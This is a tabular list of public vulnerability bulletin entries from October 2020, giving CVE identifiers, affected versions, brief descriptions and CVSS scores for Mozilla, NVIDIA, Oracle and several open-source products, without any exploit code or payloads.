mozilla — firefox	Mozilla developers reported memory safety bugs present in Firefox 81. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 82.	2020-10-22	not yet calculated	CVE-2020-15684 MISC MISC
mozilla — firefox	When multiple WASM threads had a reference to a module, and were looking up exported functions, one WASM thread could have overwritten another’s entry in a shared stub table, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 82.	2020-10-22	not yet calculated	CVE-2020-15681 MISC MISC
mozilla — firefox	If a valid external protocol handler was referenced in an image tag, the resulting broken image size could be distinguished from a broken image size of a non-existent protocol handler. This allowed an attacker to successfully probe whether an external protocol handler was registered. This vulnerability affects Firefox < 82.	2020-10-22	not yet calculated	CVE-2020-15680 MISC MISC
mozilla — multiple_products	Mozilla developers and community members reported memory safety bugs present in Firefox 81 and Firefox ESR 78.3. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 78.4, Firefox < 82, and Thunderbird < 78.4.	2020-10-22	not yet calculated	CVE-2020-15683 MISC MISC MISC MISC
mozilla — network_security_services	In Network Security Services (NSS) before 3.46, several cryptographic primitives had missing length checks. In cases where the application calling the library did not perform a sanity check on the inputs it could result in a crash due to a buffer overflow.	2020-10-22	not yet calculated	CVE-2019-17006 MISC MISC
mozilla — network_security_services	In Network Security Services before 3.44, a malformed Netscape Certificate Sequence can cause NSS to crash, resulting in a denial of service.	2020-10-22	not yet calculated	CVE-2019-17007 MISC MISC
mozilla — network_security_services	In Network Security Services (NSS) before 3.36.7 and before 3.41.1, a malformed signature can cause a crash due to a null dereference, resulting in a Denial of Service.	2020-10-22	not yet calculated	CVE-2018-18508 MISC MISC
netwrix — account_lockout_examiner	Netwrix Account Lockout Examiner before 5.1 allows remote attackers to capture the Net-NTLMv1/v2 authentication challenge hash of the Domain Administrator (that is configured within the product in its installation state) by generating a single Kerberos Pre-Authentication Failed (ID 4771) event on a Domain Controller.	2020-10-20	not yet calculated	CVE-2020-15931 CONFIRM MISC
nvidia — geforce_experience	NVIDIA GeForce Experience, all versions prior to 3.20.5.70, contains a vulnerability in the ShadowPlay component which may lead to local privilege escalation, code execution, denial of service or information disclosure.	2020-10-23	not yet calculated	CVE-2020-5990 CONFIRM
nvidia — geforce_experience	NVIDIA GeForce Experience, all versions prior to 3.20.5.70, contains a vulnerability in its services in which a folder is created by nvcontainer.exe under normal user login with LOCAL_SYSTEM privileges which may lead to a denial of service or escalation of privileges.	2020-10-23	not yet calculated	CVE-2020-5978 CONFIRM
nvidia — geforce_experience	NVIDIA GeForce Experience, all versions prior to 3.20.5.70, contains a vulnerability in NVIDIA Web Helper NodeJS Web Server in which an uncontrolled search path is used to load a node module, which may lead to code execution, denial of service, escalation of privileges, and information disclosure.	2020-10-23	not yet calculated	CVE-2020-5977 CONFIRM
object-path — object-path	A prototype pollution vulnerability has been found in `object-path` <= 0.11.4 affecting the `set()` method. The vulnerability is limited to the `includeInheritedProps` mode (if version >= 0.11.0 is used), which has to be explicitly enabled by creating a new instance of `object-path` and setting the option `includeInheritedProps: true`, or by using the default `withInheritedProps` instance. The default operating mode is not affected by the vulnerability if version >= 0.11.0 is used. Any usage of `set()` in versions < 0.11.0 is vulnerable. The issue is fixed in object-path version 0.11.5 As a workaround, don’t use the `includeInheritedProps: true` options or the `withInheritedProps` instance if using a version >= 0.11.0.	2020-10-19	not yet calculated	CVE-2020-15256 MISC CONFIRM
octopus — octupus_deploy	An issue was discovered in Octopus Deploy through 2020.4.4. If enabled, the websocket endpoint may allow an untrusted tentacle host to present itself as a trusted one.	2020-10-22	not yet calculated	CVE-2020-27155 MISC MISC MISC MISC
omniauth-auth0 — omniauth-auth0	omniauth-auth0 (rubygems) versions >= 2.3.0 and < 2.4.1 improperly validate the JWT token signature when using the `jwt_validator.verify` method. Improper validation of the JWT token signature can allow an attacker to bypass authentication and authorization. You are affected by this vulnerability if all of the following conditions apply: 1. You are using `omniauth-auth0`. 2. You are using `JWTValidator.verify` method directly OR you are not authenticating using the SDK’s default Authorization Code Flow. The issue is patched in version 2.4.1.	2020-10-21	not yet calculated	CVE-2020-15240 MISC CONFIRM MISC
open-xchange — ox_app_suite	OX App Suite through 7.10.3 allows stats/diagnostic?param= XSS.	2020-10-23	not yet calculated	CVE-2020-15004 MISC MISC
open-xchange — ox_app_suite	OX App Suite through 7.10.3 allows Information Exposure because a user can obtain the IP address and User-Agent string of a different user (via the session API during shared Drive access).	2020-10-23	not yet calculated	CVE-2020-15003 CONFIRM MISC
open-xchange — ox_app_suite	OX App Suite through 7.10.3 allows SSRF via the the /ajax/messaging/message message API.	2020-10-23	not yet calculated	CVE-2020-15002 CONFIRM MISC
openstack — blazer_dashboard	An issue was discovered in OpenStack blazar-dashboard before 1.3.1, 2.0.0, and 3.0.0. A user allowed to access the Blazar dashboard in Horizon may trigger code execution on the Horizon host as the user the Horizon service runs under (because the Python eval function is used). This may result in Horizon host unauthorized access and further compromise of the Horizon service. All setups using the Horizon dashboard with the blazar-dashboard plugin are affected.	2020-10-16	not yet calculated	CVE-2020-26943 MLIST MISC MISC MISC MISC MISC MISC CONFIRM
oracle — bi-publisher	Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: BI Publisher Security). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	not yet calculated	CVE-2020-14842 MISC
oracle — bi_publisher	Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: E-Business Suite – XDO). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise BI Publisher. While the vulnerability is in BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 8.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N).	2020-10-21	not yet calculated	CVE-2020-14880 MISC
oracle — bi_publisher	Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: BI Publisher Security). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N).	2020-10-21	not yet calculated	CVE-2020-14780 MISC
oracle — bi_publisher	Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: E-Business Suite – XDO). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise BI Publisher. While the vulnerability is in BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 8.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N).	2020-10-21	not yet calculated	CVE-2020-14879 MISC
oracle — bi_publisher	Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Mobile Service). Supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle BI Publisher accessible data as well as unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	not yet calculated	CVE-2020-14784 MISC
oracle — business_intelligence_enterprise_edition	Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions). Supported versions that are affected are 5.5.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Business Intelligence Enterprise Edition. CVSS 3.1 Base Score 7.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L).	2020-10-21	not yet calculated	CVE-2020-14843 MISC
oracle — communications_diameter_signaling_router	Vulnerability in the Oracle Communications Diameter Signaling Router (DSR) product of Oracle Communications (component: User Interface). Supported versions that are affected are 8.0.0.0-8.4.0.5. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Communications Diameter Signaling Router (DSR). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Communications Diameter Signaling Router (DSR), attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Communications Diameter Signaling Router (DSR) accessible data as well as unauthorized read access to a subset of Oracle Communications Diameter Signaling Router (DSR) accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).	2020-10-21	not yet calculated	CVE-2020-14788 MISC
oracle — communications_diameter_signaling_router	Vulnerability in the Oracle Communications Diameter Signaling Router (DSR) product of Oracle Communications (component: User Interface). Supported versions that are affected are 8.0.0.0-8.4.0.5. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Communications Diameter Signaling Router (DSR). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Communications Diameter Signaling Router (DSR), attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Communications Diameter Signaling Router (DSR) accessible data as well as unauthorized read access to a subset of Oracle Communications Diameter Signaling Router (DSR) accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).	2020-10-21	not yet calculated	CVE-2020-14787 MISC
oracle — e-business_suite	Vulnerability in the Oracle Application Object Library product of Oracle E-Business Suite (component: Diagnostics). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Application Object Library. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Object Library, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Object Library accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N).	2020-10-21	not yet calculated	CVE-2020-14840 MISC
oracle — e-business_suite	Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Trade Management accessible data as well as unauthorized access to critical data or complete access to all Oracle Trade Management accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).	2020-10-21	not yet calculated	CVE-2020-14876 MISC MISC
oracle — e-business_suite	Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle CRM Technical Foundation. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle CRM Technical Foundation. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14774 MISC
oracle — e-business_suite	Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	not yet calculated	CVE-2020-14831 MISC
oracle — e-business_suite	Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Marketing accessible data as well as unauthorized access to critical data or complete access to all Oracle Marketing accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).	2020-10-21	not yet calculated	CVE-2020-14875 MISC
oracle — e-business_suite	Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	not yet calculated	CVE-2020-14851 MISC
oracle — e-business_suite	Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Flex Fields). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle CRM Technical Foundation. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle CRM Technical Foundation, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle CRM Technical Foundation accessible data as well as unauthorized update, insert or delete access to some of Oracle CRM Technical Foundation accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	not yet calculated	CVE-2020-14850 MISC
oracle — hospitality_opera_5_property_services	Vulnerability in the Oracle Hospitality OPERA 5 Property Services product of Oracle Hospitality Applications (component: Logging). Supported versions that are affected are 5.5 and 5.6. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Hospitality OPERA 5 Property Services. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Hospitality OPERA 5 Property Services accessible data as well as unauthorized access to critical data or complete access to all Oracle Hospitality OPERA 5 Property Services accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N).	2020-10-21	not yet calculated	CVE-2020-14877 MISC
oracle — hospitality_res_3700	Vulnerability in the Oracle Hospitality RES 3700 product of Oracle Food and Beverage Applications (component: CAL). The supported version that is affected is 5.7. Easily exploitable vulnerability allows unauthenticated attacker with network access via TCP to compromise Oracle Hospitality RES 3700. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Hospitality RES 3700 accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).	2020-10-21	not yet calculated	CVE-2020-14783 MISC
oracle — hyperion	Vulnerability in the Hyperion Lifecycle Management product of Oracle Hyperion (component: Shared Services). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Lifecycle Management. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Hyperion Lifecycle Management accessible data. CVSS 3.1 Base Score 4.2 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N).	2020-10-21	not yet calculated	CVE-2020-14772 MISC
oracle — hyperion	Vulnerability in the Hyperion BI+ product of Oracle Hyperion (component: IQR-Foundation service). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise Hyperion BI+. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Hyperion BI+ accessible data. CVSS 3.1 Base Score 2.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N).	2020-10-21	not yet calculated	CVE-2020-14770 MISC
oracle — hyperion	Vulnerability in the Hyperion Analytic Provider Services product of Oracle Hyperion (component: Smart View Provider). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows low privileged attacker with access to the physical communication segment attached to the hardware where the Hyperion Analytic Provider Services executes to compromise Hyperion Analytic Provider Services. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Hyperion Analytic Provider Services accessible data as well as unauthorized read access to a subset of Hyperion Analytic Provider Services accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Hyperion Analytic Provider Services. CVSS 3.1 Base Score 4.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L).	2020-10-21	not yet calculated	CVE-2020-14768 MISC
oracle — hyperion_infrastructure_technology	Vulnerability in the Hyperion Infrastructure Technology product of Oracle Hyperion (component: UI and Visualization). The supported version that is affected is 11.1.2.4. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Infrastructure Technology. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Hyperion Infrastructure Technology accessible data as well as unauthorized access to critical data or complete access to all Hyperion Infrastructure Technology accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N).	2020-10-21	not yet calculated	CVE-2020-14854 MISC
oracle — java_se	Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).	2020-10-21	not yet calculated	CVE-2020-14779 CONFIRM MISC
oracle — java_se	Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).	2020-10-21	not yet calculated	CVE-2020-14782 CONFIRM MISC
oracle — java_se	Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).	2020-10-21	not yet calculated	CVE-2020-14781 CONFIRM MISC
oracle — java_se	Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N).	2020-10-21	not yet calculated	CVE-2020-14792 CONFIRM MISC
oracle — java_se	Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).	2020-10-21	not yet calculated	CVE-2020-14798 CONFIRM MISC
oracle — java_se	Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).	2020-10-21	not yet calculated	CVE-2020-14797 CONFIRM MISC
oracle — java_se	Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).	2020-10-21	not yet calculated	CVE-2020-14796 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).	2020-10-21	not yet calculated	CVE-2020-14838 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: X Plugin). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14870 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14867 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Logging). Supported versions that are affected are 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14873 CONFIRM MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	not yet calculated	CVE-2020-14866 CONFIRM MISC
